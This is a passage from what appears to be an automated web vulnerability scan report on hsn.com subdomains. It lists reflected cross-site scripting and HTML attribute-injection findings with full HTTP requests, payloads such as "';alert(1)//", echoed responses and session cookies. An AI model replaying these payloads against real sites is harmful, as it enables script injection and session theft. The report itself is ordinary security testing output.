shareUrl="http://beauty.hsn.com/wei-east-gifts-of-herbal-beauty-12-piece-china-herbal-collection_p-6184242_xp.aspx?8c813" a=b 941dc2f6ef4=1&cm_mmc=sharingsite*email*PD*968208"
shareTitle="Wei East Gifts of Herbal Beauty 12-piece China Herbal Collection at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.12. http://beauty.hsn.com/wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1957"%20a%3db%20de9bbf913e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1957" a=b de9bbf913e4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx?e1957"%20a%3db%20de9bbf913e4=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:53 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9yoMOwFe8nm3L6LO035bO5&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx%3fe1957%22%2520a%253db%2520de9bbf913e4%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=2DeknegkyiitxzzCqW63dA%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:53 GMT; path=/
Set-Cookie: sessionid=id=S4A5rjcMg27Vz7ASJBu2nIA4S%2fWnqFgxByiU51cWqqQDX9d6%2feFL2A%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=ah3xYnFKPpXBwZk2REujmfOACyrMCtCg3528FwU0ERfdgurWp2XxDw%3d%3d&abtid=414XoXx7ynogLx%2bZk6Qea9APjeSpb0StLKAiAkUgvVeByaCJPyiqTQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:53 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:53 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=e8TrygVMttuwXBROhUOepdsAahbDDzH1PD1GfaeD7qw%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=E7E422744822FF2438AE2AAC3CF3F2FF; domain=.hsn.com; path=/
Set-Cookie: TLTHID=E7E422744822FF2438AE2AAC3CF3F2FF; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:52 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 115330


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
n.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-gifts-of-white-lotus-hydration-12-piece-collection_p-6184244_xp.aspx?e1957" a=b de9bbf913e4=1&cm_mmc=sharingsite*email*PD*968211"
shareTitle="Wei East Gifts of White Lotus Hydration 12-piece Collection at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.13. http://beauty.hsn.com/wei-east-wrinkle-relief-system_p-6119231_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-wrinkle-relief-system_p-6119231_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31632"%20a%3db%20ce060bae64a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31632" a=b ce060bae64a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-wrinkle-relief-system_p-6119231_xp.aspx?31632"%20a%3db%20ce060bae64a=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:46 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9RW%2bljNKwmcM93Y0ECHntq&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-wrinkle-relief-system_p-6119231_xp.aspx%3f31632%22%2520a%253db%2520ce060bae64a%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=C0JsMK0xXtyD%2bvwTPhvm5A%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:47 GMT; path=/
Set-Cookie: sessionid=id=luueilc3XEZUPD6SY3MU%2bw2I2xGuXoAaBiMDdQkAxmcRmPfiOxqWVw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=9DoHr9mBlLty%2fVC8o70d4r2zWOHO%2fDy10peK2%2bqA8Z42hZW5Cx28%2bg%3d%3d&abtid=O51WPMOe%2fRE0phsDmmFtRFy0SUi3NvBy14mlogPdOQnODRxYoEAtcg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:46 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:47 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=QPuHs32rJZrtn6DTw2%2fORgv63udGAPmXufhh3T0ezgU%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=48AFF7844FE393B56CF27E9AB4325A81; domain=.hsn.com; path=/
Set-Cookie: TLTHID=48AFF7844FE393B56CF27E9AB4325A81; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 143590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-wrinkle-relief-system_p-6119231_xp.aspx?31632" a=b ce060bae64a=1&cm_mmc=sharingsite*email*PD*961662"
shareTitle="Wei East Wrinkle Relief System at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-position:
...[SNIP]...

1.14. http://cnt.hsn.com/alerts/Js [abtestid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cnt.hsn.com
Path:   /alerts/Js

Issue detail

The value of the abtestid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c18ab'%3balert(1)//3034031152f was submitted in the abtestid parameter. This input was echoed as c18ab';alert(1)//3034031152f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alerts/Js?abtestid=c18ab'%3balert(1)//3034031152f&abtestval=B&v148 HTTP/1.1
Host: cnt.hsn.com
Proxy-Connection: keep-alive
Referer: http://www.hsn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; CustState=Now=12/10/2010 2:30:50 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; TLTSID=AD2EA45D444C5361509642BD6C0C11B2; TLTHID=AD2EA45D444C5361509642BD6C0C11B2

Response

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 19:32:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 5236


var cacheDuration = 5;
var ABTestId = 'c18ab';alert(1)//3034031152f';
var ABTestValue = 'B';


function GetNbrOfNewAlerts( deliveryMethod, callback )
{

if ( ABTestId == '23' && ABTestValue != '' )
{
try
{
var ale
...[SNIP]...

1.15. http://cnt.hsn.com/alerts/Js [abtestval parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cnt.hsn.com
Path:   /alerts/Js

Issue detail

The value of the abtestval request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78c3b'%3balert(1)//16f5180c2e3 was submitted in the abtestval parameter. This input was echoed as 78c3b';alert(1)//16f5180c2e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alerts/Js?abtestid=&abtestval=B78c3b'%3balert(1)//16f5180c2e3&v148 HTTP/1.1
Host: cnt.hsn.com
Proxy-Connection: keep-alive
Referer: http://www.hsn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; CustState=Now=12/10/2010 2:30:50 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; TLTSID=AD2EA45D444C5361509642BD6C0C11B2; TLTHID=AD2EA45D444C5361509642BD6C0C11B2

Response

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 19:32:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 5236


var cacheDuration = 5;
var ABTestId = '';
var ABTestValue = 'B78c3b';alert(1)//16f5180c2e3';


function GetNbrOfNewAlerts( deliveryMethod, callback )
{

if ( ABTestId == '23' && ABTestValue != '' )
{
try
{
var alertTrackingCookie = ReadCoo
...[SNIP]...

1.16. https://cnt.hsn.com/alerts/Js [abtestid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cnt.hsn.com
Path:   /alerts/Js

Issue detail

The value of the abtestid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7b8'%3balert(1)//351f1c83e16 was submitted in the abtestid parameter. This input was echoed as 5b7b8';alert(1)//351f1c83e16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alerts/Js?abtestid=5b7b8'%3balert(1)//351f1c83e16&abtestval=B&v148 HTTP/1.1
Host: cnt.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TaazABUser=true; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 19:49:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 5239


var cacheDuration = 5;
var ABTestId = '5b7b8';alert(1)//351f1c83e16';
var ABTestValue = 'B';


function GetNbrOfNewAlerts( deliveryMethod, callback )
{

if ( ABTestId == '23' && ABTestValue != '' )
{
try
{
var ale
...[SNIP]...

1.17. https://cnt.hsn.com/alerts/Js [abtestval parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cnt.hsn.com
Path:   /alerts/Js

Issue detail

The value of the abtestval request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a40e7'%3balert(1)//66b5c1a7527 was submitted in the abtestval parameter. This input was echoed as a40e7';alert(1)//66b5c1a7527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alerts/Js?abtestid=&abtestval=Ba40e7'%3balert(1)//66b5c1a7527&v148 HTTP/1.1
Host: cnt.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TaazABUser=true; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 19:49:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 5239


var cacheDuration = 5;
var ABTestId = '';
var ABTestValue = 'Ba40e7';alert(1)//66b5c1a7527';


function GetNbrOfNewAlerts( deliveryMethod, callback )
{

if ( ABTestId == '23' && ABTestValue != '' )
{
try
{
var alertTrackingCookie = ReadCoo
...[SNIP]...

1.18. http://jewelry.hsn.com/colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://jewelry.hsn.com
Path:   /colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3091"%20a%3db%20fe823b8a846 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3091" a=b fe823b8a846 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx?b3091"%20a%3db%20fe823b8a846=1 HTTP/1.1
Host: jewelry.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:53:03 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2bT%2bTn8LUZuIGu4LbgFm8nV&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fjewelry.hsn.com%3a80%2fcolleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx%3fb3091%22%2520a%253db%2520fe823b8a846%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=cD%2fnNusgz4g3%2fr6qt%2bjUbA%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:03 GMT; path=/
Set-Cookie: sessionid=id=VdqpLuvM84LkxUyqvjNHBjaKJfqEHr9fe7eSFOh55WzBOCtSYIC6mA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=45bE231NN%2bO5%2fOawg6dr8lNM9JVVy7F6Z5WnoI4lrNF7lpRsf5%2fxPQ%3d%3d&abtid=mSPs7BXKsEg0y8whbNI57ey%2fCu0vLLcE8o5D%2fiyFv4BdrR6APltgbA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:03 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:53:04 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=p84mE4MLsmcPWZOIR%2fOqj7XZKHF83X7ue98YKpV3HiI%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=F0A4D18449740518B30F8A8D4EBDBF95; domain=.hsn.com; path=/
Set-Cookie: TLTHID=F0A4D18449740518B30F8A8D4EBDBF95; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:53:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 139463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
n.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://jewelry.hsn.com/colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx?b3091" a=b fe823b8a846=1&cm_mmc=sharingsite*email*PD*567865"
shareTitle="Colleen Lopez Moroccan-Style Bib Necklace and Earrings Set at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.19. http://kitchen-dining.hsn.com/main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://kitchen-dining.hsn.com
Path:   /main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05ac"%20a%3db%20bcd9487a494 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b05ac" a=b bcd9487a494 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx?b05ac"%20a%3db%20bcd9487a494=1 HTTP/1.1
Host: kitchen-dining.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:53:34 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9TMIyM0UbX8npnibH2vLZO&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fkitchen-dining.hsn.com%3a80%2fmain-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx%3fb05ac%22%2520a%253db%2520bcd9487a494%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=RZBfo6yE73iKW%2f3sW%2fdGxQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:34 GMT; path=/
Set-Cookie: sessionid=id=CdUGU2Wn4695WRUR0dJsRWiE81t%2bozBEsj9TZf7ILubPBXA1rvIyUQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
